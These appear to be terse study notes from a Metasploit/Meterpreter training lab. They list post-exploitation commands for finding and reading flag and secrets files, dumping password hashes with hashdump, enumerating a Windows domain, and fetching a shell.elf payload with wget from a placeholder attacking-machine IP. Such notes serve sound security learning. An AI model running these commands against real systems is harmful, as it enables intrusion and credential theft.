meterpreter : Run on memory on target, we can interact with like shell by metasploit
meterpreter > {shell icon} search -f flag.txt
meterpreter > {shell icon} cat c:\\Users\\Jon\\Documents\\flag.txt
hashdump password hash
python3 -m http.server 9000 wget http://ATTACKING_MACHINE_IP:9000/shell.elf
IPS (Intrusion Prevention System) and IDS (Intrusion Detection System) sysinfo on Windows NetBIOS domain using post/windows/gather/enum_domain search -f secrets.txt hashdump